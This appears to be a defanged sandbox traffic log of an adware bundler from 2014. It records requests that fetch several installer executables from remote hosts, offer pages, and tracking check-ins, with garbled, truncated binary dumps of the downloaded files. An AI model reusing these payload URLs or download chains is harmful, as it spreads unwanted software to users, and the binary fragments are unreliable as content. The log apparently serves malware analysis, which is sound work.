Date: Tue, 21 Oct 2014 02:32:19 GMT
Location: hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe
Server: openresty/1.5.8.1
Content-Length: 78
Connection: Close
hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedup
mypc.exe..



GET /test.html HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:31:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
8..correct...0..



GET /apps/dist/9020-2085_TheBestDeals.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: xml.collectioncss.net
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Expires: Mon, 27 Oct 2014 20:43:57 GMT
Last-Modified: Sun, 12 Oct 2014 12:14:36 GMT
Cache-Control: max-age=604800
Content-Type: application/octet-stream
ETag: "623421-50538b9bc8300"
Accept-Ranges: bytes
Server: Apache
Content-Length: 6435873
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L.....*J.................\..........<2.......p....@......
....................................................................s.
......... ............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc... ............v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET //Styles/Softwares/db393704_vuupc.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:26 GMT
Content-Type: application/zip
Content-Length: 741
Last-Modified: Fri, 10 Jan 2014 15:21:49 GMT
Connection: close
ETag: "52d0100d-2e5"
Accept-Ranges: bytes
PK.........^.B................images/PK........op*D.r.8....C.......vuu
pc.css.S.N.0.=7R.a......@.:.].B...@{v.7.p<...e .}mC.[....!q2~o.....
53-.pr.wM.'y.......~b.5\Y8..._...Pb.u.....G....Q..o~..........YD9g...Q
...... ...f.....A#....jK.T...h4....}.....t7{.<P..3C.h..I..Dik:..>
;..J(z.8.H......*KZ...4...EF.a.W$IC.R.Z.G.P..8.V.j..M. ...]aN......DC.
..$../........c:. .B..rb..B".T.E.@...........>.=On...5-_[f8.}..^.K.
.x..v......k.,..A).,..!.n4%7...iQ...W!.....u."........37..a...)`......
..b..E.E..^.'=.......I.....,\.............[.....>.k..11......PK....
.......^.B..............$...............images/.. ............A.V...B]
......B].....PK..........op*D.r.8....C.....$....... ...%...vuupc.css..
 ...........k.....R.[.....R.[.....PK......................



GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: download.uniblue.com
Connection: Close


HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 21 Oct 2014 02:32:18 GMT
Location: hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe
Server: openresty/1.5.8.1
Content-Length: 78
Connection: Close
hXXp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedup
mypc.exe..



GET //Dictionaries/English.xml HTTP/1.1
Host: staticrr.paleokits.net
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:07 GMT
Content-Type: text/xml
Content-Length: 626
Last-Modified: Fri, 12 Apr 2013 09:51:55 GMT
Connection: close
ETag: "5167d93b-272"
Accept-Ranges: bytes
<dictionary>.  <installed> Installed </installed> . 
 <installing>Installing</installing> .  <installingetc&
gt;Installing...</installingetc> .  <downloadError>An Erro
r has occurred</downloadError> .  <takeFewMinutes>It may t
ake a few seconds</takeFewMinutes> .  <confirmExit>Are you
 sure you want to exit?</confirmExit> .  <installClose>Do 
you want to install the remaining offers?</installClose> .  <
welcome>Welcome</welcome> .  <license>Welcome</licen
se> .  <options>Additional Options</options> .  <ins
talando>Installing</instalando> .  <finish>Finished<
/finish>.  <downloadingetc>Downloading...</downloadingetc&
gt; .</dictionary>..



GET /apps/dist/9020-2085_TheBestDeals.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: xml.collectioncss.net
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:15 GMT
Expires: Mon, 27 Oct 2014 20:43:57 GMT
Last-Modified: Sun, 12 Oct 2014 12:14:36 GMT
Cache-Control: max-age=604800
Content-Type: application/octet-stream
ETag: "623421-50538b9bc8300"
Accept-Ranges: bytes
Server: Apache
Content-Length: 6435873
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L.....*J.................\..........<2.......p....@......
....................................................................s.
......... ............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc... ............v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: aff-software.s3-website-us-east-1.amazonaws.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: c9gp3VWrDwffFNTokgZvTL9SUYkEnQXf9h4UIw au6VCQB1tltCiDjZzX3 66NJ7
x-amz-request-id: 6213E9D41DE95D7C
Date: Tue, 21 Oct 2014 02:32:16 GMT
Last-Modified: Tue, 08 Jul 2014 14:34:06 GMT
ETag: "af37247590f4e4b8a8a214a091ea6067"
Content-Type: application/octet-stream
Content-Length: 73816
Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
........................|........................................t....
......0m..............p...............................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
..0m.......n...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET //Displays/Softwares/16220985_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:25 GMT
Content-Type: text/html
Last-Modified: Thu, 03 Oct 2013 10:28:07 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
1f87...............r..u...W....UEB..{..\.!..`...@i.?.!0$g.`..@.}...\`.
.t.L..j7UIU*.dE.3.O....>3..rp.....7..;.xq..t..vy..?w.......;8x.s...
........?._N..n....w'.b....:(..n2.....eY...\.....b=w....*.|Z/.........
.......*V..v...|6)..[.nu..aqU/.8...",.u.Y..i^O..&.}}.L..v.|.^...?.jz..
.......?../....O.^.....I9..wZ..c=..|..E.....].r....).rYQ.;#/.t]6......
}...{\y.~...b...E~]..uU.]$6.Vy.wy.ZWy.t.z9.....mV....:.:...S6.....I.O.
O./&oL.|.'.>\.....Y..$ci....{Q..m.>..p.EU.......r]..b.....gF,%YV
he1-..}w.M...X...DO..;-. e....Y.....a..PV.,.\.....j.9.g...K&...Sz.3.|.
.*.......w{.J.Z._VY.c.H.i.yi......\..^.y...$_Lr..a..|.....^.........=v
G.a..r0.......b{......V..r{.F..w...m..b(en..d3...1.....c.v{y.WTh.;gg.t
......,V...........U9.V.'...U...k.....?*.....;.g~.f.....iU...,[...|.mc
..Fj...Ww.X.2 &.Y.....-&.n....d..rM].....J>-.}....}....fX..(m...e.`
.......t.......].WnQ....."...U.H..q.)qd.i....|.kj...L...{.^.V......V..
*..6..JTb1R.Bz.......3.....}.b..UW....f.&m...v...n.....'..^.Pp.....>
;c.H.S..........4..$.-.$ru....2........5:1.W..Rh...|t....;............
.....y..>t..z......;....?.G=wi_..].../...........z.8....._..k.]5..O
G.....Q".A..w.=...w6.....:>wg....C*.=v.....w.a....H<$......._...
j......;.w~...%\%.:;.e....B...TX.7..gv.z.^9.............s.W.{.v.b...75
/...r6..<...C..d...I..0ay../.4.......C..q..5..L6..E..Z..0...]...Y..
.b......!S..56G.-...#...*......0=.yg..A.]........8;..y..Ir.~.r..W.eU..
[email protected]..'.).".bv.q.|...=yM......<H...p$8 I...*....ky
$N.FU.........s.p........7.._...?....u...q"...............BHk. t.E
<<< skipped >>>


GET //Styles/Softwares/e7bf26c3_mypcbackup.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: application/zip
Content-Length: 7774
Last-Modified: Tue, 15 Oct 2013 10:54:23 GMT
Connection: close
ETag: "525d1edf-1e5e"
Accept-Ranges: bytes
PK.........]OC................images/PK.........fJC..2.....T.......ima
ges/bullet-shortw.gifs.t..L.d.dh`d......#|..\.K....}EAbrvj.BRjzf......
..2Sl..M}.|..S32=..R...B....-S....l*.*r.rSK..*rs...*l..S..R..l.....XII
...#HB.d.s~Q.....n...........................X..Y.. @......4. .7.]@..R
FII...~yy.^..^~Q.....%..##]...........be......E..%..y. ~bR~i........pc
......K....H,.7.3.GR..._in.\uqIPj.~..!....A....E..@.. ..V.E..%.E!..9.P
..././../Pp.6S..ML....h.u..Zy...$.%.z..*.E.23S..L.,.M,..,....]....M...
.,......\.z.z]..KsS.J`zS.z-p..%............\....2q....yP.)..b.S.>.1
.hQ........p...I?5............~......._>.......o^.z.....O.?z.....wn
..y....W._.x....gN.:y....G..:x`...{v...c...[6o..a...kV.Z.b...K./Z.`...
sf..9c...S&O.8................................ ?/7'; 3#=-5%9)1!>.6&
:*2"<,4$8(0................................@_OWG[KSC]MUEYIQA^NVFZJR
B\LTDXHP.................A.'..dd.a..P.........{...........PK.........N
.C.U.?}...w.......images/mypcbackup.png}X.T.....CW....tH(...".wA..B.PB
S..."H/"..).D:"E.*M.P..D@........[..Y_.9..=g...Y.....J......T.jJ..w(.f
!'.?/[email protected].(...][email protected]..%.D.......w...)2r.
.6H...d.rprG..Z:. ';.......PD9:.=.B.>.1B>rA...r. ..)<...c..ws
u...G........!`._......A.j....^(.LHT...............@"Pa........I...D$@
.,`|o^v.R.J*....B..1..)....O.OT.........8DD..........Awo....P.H/'.....
..mc... ......./Zw.....0....DX..._...........1.(.....(...1@y.}........
..R.B.`.^Fh...Y.sDc...h....8.G.........B[[J...c..D. !.x.......TY...S.T
.... .((....%....I...%..*..>n(w..X..cU. .....Fy9...T..n...-...b
<<< skipped >>>


GET //Styles/Templates/d7d18a25_Win-Y.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate,gzip, deflate
Host: staticrr.paleokits.net
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:20 GMT
Content-Type: application/zip
Content-Length: 218389
Last-Modified: Wed, 26 Feb 2014 11:59:42 GMT
Connection: close
ETag: "530dd72e-35515"
Accept-Ranges: bytes
PK.........F.C................images/PK.........F.C.T.Z....ZA......ima
ges/bg_app.jpg..y8....o[9:..Z(.-".-;...5QHcD...2c.y..t.B*.':D.O..M*.X.
ud.?....c.3.=..T..y....\s.5s......?...k...~`..........A.....DLCa......
~..o..).....( #...}P..J0.B.......U........x..1.q..>.RF.....C\5l...&
p?.K.....s...`.>.C..=.......x.`.'..:X}[email protected].| s..^.....
h(A.a..P..*J*j....{dT.*Pe.............*.|A...>.:....s...!.P..F....B
.WV...f......P..G.xc.....G0......!.(.....1Th.>........'[.....?7E ..
..q...s.`..@..#<...........:&h.w....B..lE{?T.*...(c..!c...G2......X
!.C..0...>.......c.55267Q7..k......h....j.B......?.5E.B.pd...>_.
j...).O..h.0..9...a!....Z.M...P-c...;.r_..Y.r_...*..Q.n.?......E..2_..
G.jG..fL......<.........p~.~...\...........) ".s......xEx.Dx./.N...
...|q.......x...Z...e.........<.?.......5...k...x..u.......&.....G&
lt;[email protected]..'.(...8..CB.R..Cs..K..M...B.....6[.;.wh....?....?..
.. /...W._.&& .z......;V...][email protected].>
...x....,... ......Zh...U............\....R...'u.M.EK..=.}....3.>2w
'U.t..[.v..1.1i.L.>r^.N.r..v.......mt.;......f.1&..=..G......(...#.
..L. B ...A..}.m. .}"g.6@s.\.p...%&W....$...w........$>xc0......K..
..Q.W7...I..d......S.M.....[.......bp1..\.........bp1..\.........bp1..
\.........bp1..\.........bp1..\.........bp1..\.......#..o*).bX.C$...5.
......G...1LmW.4..,..1..\...v..?t ......zK..wR%I..NCYa.&b.v:.n.v.&}..P
.Hj....8..%..?q........Y..i.Z.....^..=..,..?....&.>M.n.....{...J..B
.u.......-.E........\.>t....L...C..[.h2M.8...d.b.]e...b.[L. .H9
<<< skipped >>>


GET /test.html HTTP/1.1
Host: track.v2.sslsecure2.com
Connection: Close


HTTP/1.0 500 Internal Server Error
Date: Tue, 21 Oct 2014 02:31:53 GMT
Server: Apache
Set-Cookie: vsid=902vr1614043138202826; expires=Sun, 20-Oct-2019 02:31:53 GMT; path=/; domain=track.v2.sslsecure2.com; httponly
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET //Displays/Softwares/4d947901_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:27 GMT
Content-Type: text/html
Last-Modified: Mon, 07 Oct 2013 12:18:54 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
2a3e..............ks.F.._g..;.Q.n.*]l'.L2.WA.e3.H.^.x.lA$$aL..^.h>.
......%....J&..t?.{.....a..z.'Y?.....0.....e ..o.;.w.......k.....tz...
..W'..0........u^...a9...i.Z.mo1_..r>;\?,......E1.,.....{nd....o^..
...o{.r=-n..|(...].....-.kv.Z...j...^.....wR....&.{..X....b.Y...?.....
. ..............?.y.X.o.....^...\..E1..l.^n..|......&\..r..my.........
..s.\.L._...7.M.U1 ..u.^..BZl......|.Y....7...~....J........ca..?.qj|.
...F....i.f4...t.....*n.*..K...|[email protected]>..W."..|........|..lg.
....nJ(....zYV .....P.s(...].s......S.P.x.3.....]...C(...s....1.v....z
...g..ZT..>6.......-?Z\< ..%l.7..].....! k3_t..Z.wP../[A...~.0.9
...q.B.{....m1..u.1w..C.|R..{.u\ ......c..Q....m(.n.&.#...a.lU......]a
_*......2.U_.}.x..X.K{F..j.).......I.o}..........iyW.o.2.*...!....C..b
..(.E>].&...g.\.^5o.'....X..2....r^....t3.....0X.=.N...<.<.^b
...\~....[.....t.....f9_.a..(.Y~...{.#.."....R....8..}wT.....(.. P..v.
....FZ."..z}/.2....r....uB>....=.Lw..k....0.........La'b.i.......%.
.*..|......0...E..7.aV/.........7................ts&....P%5;i.....q6..
[email protected]..@..%..~..6.5.9......1..B.d.U..B<.. .a..q,.F..~,.
.....e.Q.,...|../..Y$...\.@vR:."[email protected].]...Wr.@.,...H....:{..."-[......
z..N.!. .F...0........q. a...7...y...r|....>.....M>.).9.y....!Y.
9.j..........=..o...@.?.|.....=.9s..F.V..%...f[...F....\.U..y-....&n..
...(C.................[.....Q8.}[email protected].&..-...[..w..GO...`..4.p.
.*Q=........a.,.../....,.E.bC..s\/....n...|!........=......F.J..B..x..
h..m...K.......H.....I.2....X...|.p.[MZ.<...K...d.s.WG..P...D..
<<< skipped >>>


GET /installer.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: get.ctx-genesis.com
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:14 GMT
Content-Type: application/octet-stream
Content-Length: 1554432
Last-Modified: Mon, 13 Oct 2014 10:14:10 GMT
Connection: close
Content-Disposition: attachment; filename="GenesisInstaller.exe"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<og7x..dx
..dx..d>_.dd..dqv.dy..d>_.d)..d>_.d...dqv.du..dx..d...du\.dq.
.du\.dy..du\.dy..dRichx..d........PE..L.....;T.................r...j..
[email protected]............@...........
..........................d....p..........................\...........
............................@.........................................
...text....p.......r.................. ..`.rdata..X............v......
........@[email protected][email protected]
[email protected]......................@[email protected]..
\[email protected]......................................
......................................................................
......................................................................
......................................................................
........................................................U..Q3..E...]..
..U.....V..c...]..U..Q3..E...]....U.....W......h..U...k.....].....U...
..W......h..U..ik.....].....U.....W......h..U..Ik.....].....U..j....W.
.....]................U..j....W..a...]................U..j....W..A...]
................U..j....W..!...]................U..Q3..E...]....U..Q3.
.E...]....U..hp.B.h..B.h....j.h..W......h..U..xj.....]....U..h..W...aX
......h..U..Tj.....]................U..h. X...aX......h..U..$j.....]..
..............U..h..X..paX..n...h..U...i.....]................U..h
<<< skipped >>>


GET /test.html HTTP/1.1
Host: track.v2.sslsecure4.com
Connection: Close


HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 21 Oct 2014 02:31:55 GMT
Server: nginx
Content-Length: 8
Connection: Close
correct...



GET /debug/Version/4_0_6_30/Nsis/GetInfo HTTP/1.0
Host: dtrack.sslsecure1.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:31:35 GMT
Server: Apache
Set-Cookie: vsid=916vr1614042954825116; expires=Sun, 20-Oct-2019 02:31:35 GMT; path=/; domain=dtrack.sslsecure1.com; httponly
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<html>..<head><meta name="t
ids" content="a='7377' b='9745' c='sslsecure1.com' d='entity_mapped'" 
/><title>sslsecure1.com</title>..<meta http-equiv="C
ontent-Type" content="text/html; charset=UTF-8">..<meta http-equ
iv="X-UA-Compatible" content="IE=EmulateIE7">..<style type="text
/css">..*{margin:0;padding:0; font-family:Arial, Helvetica, sans-se
rif}..input{outline:none}...wrapper{width:1024px;height:768px; margin:
0 auto; background:url(hXXp://i2.cdn-image.com/__media__/pics/7375/lef
t.gif) no-repeat 0 130px}...inner-wrapper{width:1024px;background:url(
hXXp://i3.cdn-image.com/__media__/pics/7375/right.gif) no-repeat right
 130px; height:768px}...header{padding:40px 0 20px 0}..h1{padding-top:
10px}...header h1 a{color:#78603b; font-size:35px; font-weight:bold; t
ext-decoration:none}...header span{color:#6a6a6a; font-size:13px}...se
archbox .box{width:278px; height:36px; background:url(hXXp://i1.cdn-im
age.com/__media__/pics/7375/searchbg.gif) no-repeat; border:none; line
-height:36px; padding:0 5px}...searchbox p{font-style:italic;color:#6a
6a6a; font-size:13px; padding-bottom:5px}...searchbox{float:right; pos
ition:relative}...logobox{float:left}...container{width:1024px}..ul{ma
rgin:0 auto; width:33%; padding-top:38px; text-align:center}..li{list-
style:none; padding-bottom:12px}..li a{font-size:24px; color:#0066ff; 
font-weight:bold; line-height:40px; text-transform:capitalize}...c
<<< skipped >>>


GET //Displays/Softwares/c9c92824_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:24 GMT
Content-Type: text/html
Last-Modified: Thu, 09 Jan 2014 10:45:56 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
1759...............n.....#..P  ...Tl...L.K..!.....`,.A.t.LG=.....s....
.....7....;......D.%...........9....p.................7.o....~....~...
..xp.a.|...............M...=\..PTM....aX.E...p...P...p......&.b?.....k
F25.o..U.......yx.!..v...........c...a...._..<}..........7g<.&=.
........x......fC.~.....y.q)....C..%O.V...V......v...U.z...*[email protected]
.T.~Yt..!....P4eX.&..!..v..du1.....0v........l.M.K.v.............I/...
.....N.g.........O.,..CU...#6.^..*..v....7&.Pa..MU..o...j..m...P..B-z$
...< .g..j..$&.ua....K...;.h......L.W....b.2...OU.b....}%..\;5...u:
......L....R...1.M\~<.d...K]QV..^r....1_t.......B........ ...B.zvQ.
.......z9...........F.....c`.R...!O..5M..l0!...E...:.q.....RF .({.....
...gq`*s..H6.....$.....2h...Ix..,..]...>..-.b..B....2..Qh...P..M..H
.T..fo.t.uY.......C.b.m...T(y..{f[.c..].G..&.|r........r.)b.Wi.eF1H..t
....\U..J.L..Z..........I]..=i....pU,o..e>.V..F....t0i.H.....K..N..
/W....M;.9......[2..p$......f..ll.9..y)......)....k.-(....h..5.......)
vR.9.Q..>cG(..X.-...UUW....~...j.&...I.........u..%nx-..|e.dU.....6
^U.!....D.?.{"..,....Eth.... ...._t....X.o....{..B....#.1.....m.../.y.
.N.;...X.........i....>.E].Mg.Ix....{..o~.9...YdL0'.a5*.e..}'..Jd..
.`i.f..r......6..I..b.<..R..0.gIL1.X..B.A...q.N|..v......%...0..&.c
.-7)?......'....*]......q..Y."._ol..qi.j.H.OZ.....\4KN.....b.&U....R.X
...||:..b.4.<..I.&..........l!..\.0\...R.&\5hf4f.....q....m....n.._
..- R..iS..I.B.D.>...........b.2T..N......T.M9-...t..].cM.:..>.6
..n.I.......'.>D......C..#...=..x....2...4......V.5.E(..4LH".P-
<<< skipped >>>


GET /ba/full/mon/setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: dl.newgenstatsnet.com
Connection: Close


HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 02:32:13 GMT
Connection: close
Accept-Ranges: bytes
ETag: "1413807219"
Last-Modified: Mon, 20 Oct 2014 12:13:39 GMT
Cache-Control: max-age=2514
Content-Length: 11426128
Content-Type: application/x-msdownload
X-HW: 1413858733.dop006.ny2.t,1413858733.cds053.ny2.c
Content-Disposition: attachment; filename="setup.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
................ ..............................p......................
.G....................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected]......
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


GET /cm/softlate/speedupmypc/option9/setup/speedupmypc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Host: files.uniblue.com
Connection: Close


HTTP/1.1 200 OK
x-amz-id-2: PJhb3matOwf los/RaPUHQsIe/ALJfuy9EzelIJ 3cnnmmNzdDsxx6XNUr8pXDPP
x-amz-request-id: C9D3001AD0E2D90A
Date: Tue, 21 Oct 2014 02:32:20 GMT
x-amz-meta-built_from_package_id: 23466
x-amz-meta-built_from_package_version: 84
Cache-Control: max-age 86400,public
Last-Modified: Fri, 10 Oct 2014 19:53:33 GMT
ETag: "7ddda0daedd1ef875325bad41071317a"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1294552
Server: AmazonS3
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....WZR............
.........D............... ....@.......................................
.......@......................................,%..........X...........
......................................................................
...............text...,........................... ..`.itext..D.......
.................... ..`.data........ [email protected]..
...V...0...........................idata..............................
@....tls.....................................rdata....................
..........@[email protected]...,%.......&... ..............@..@................
....................@..@..............................................
......................................................................
[email protected]............
@...string([email protected]......@...............................@.....
.... 9@.([email protected]@[email protected]@[email protected]@..9@.,[email protected]@[email protected].%..A....%..A.
...%..A....%..A....%..A....%..A....%(.A....%..A....%$.A....%..A....%..
A....%..A....%..A....%..A....%|.A....%x.A....%t.A....%p.A....%l.A....%
h.A....% .A....%d.A....%`.A....%\.A....%..A....%..A....%..A....%X.A...
.%T.A....%..A....%..A....%..A....%P.A....%L.A....%H.A....%D.A....%@.A.
..S..........$D...T.J....D$,.t...\$0....D[..@..%<.A....%8.A....
<<< skipped >>>


GET //Displays/Softwares/6fe4b061_display.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Host: staticrr.paleokits.net
Accept-Encoding: gzip, deflate
Connection: Close


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 21 Oct 2014 02:32:23 GMT
Content-Type: text/html
Last-Modified: Tue, 25 Mar 2014 18:46:17 GMT
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
1674...............r.Wr...*....6...R.dg..Y.............fH...`g... ..:W
.J^ ..}.?I~_.3.P.l_D..E.....u..}.O...t.~.{...N.]...>r..^4...k6..>
;9....p....U..>M.[.....G.|...UZ4....-....h...&.W...:]m..&].eV6w.b..
O.:.......M.Y.....t1.....n3O.q5-..:-..*....".s........NO........]e....
.d.5.;...O...._....N.Ez.6_,..vrHY..4].lUn..L....n.. .S.e.....O....f...
.M..9..v.K.x..)...6.....Zl.o....x.-..i.v......<.%`~}....':)..}V . i
~}....5.(.M.2_.w.'^}... .q.qe.HM.:.-Zj.J.......%r...`.)g..&.....Y...R.
V.G."OP...........K.Z...4(..xv..."...0..OYZ...7.....s........0.3..ccf.
t.....V..IE.d..&...P...n..6q..Y..C.>.F.Z]...;...k.{..1.6r..n2..c.&g
t;..q..;.j.#M}y...../[.....gc......p.7......qk....Q.;...nt.=~...$..dWp
.:...........~.....7.L.-.u.p/......._......,]...=.....,...x.y...M.....
.`...O.R.......az..kwBE;_....../..../.}.m.....}...r..t.._}...o^5\....O
....\'A..:.y.....Tp....w/^.x...'..".V..&-../Db.;\.sOSW..K..._<[email protected]
..q..O.>F.....Q4....Um,Bf5...n0.FQ.;D......6..#...B.v.Z..Qt......Z.
C....G..(.......kVv..G...k.e...s.._.Z..,/!.u-{T...............B.....~~
..?:@.....Hlu.F.m........&t.....|v.....n......jv..{....h..v......_=o.1
......9.....LF..nxmI.$:f#..(#i....j......w.D3...qC.vx.M0..1...om.....[
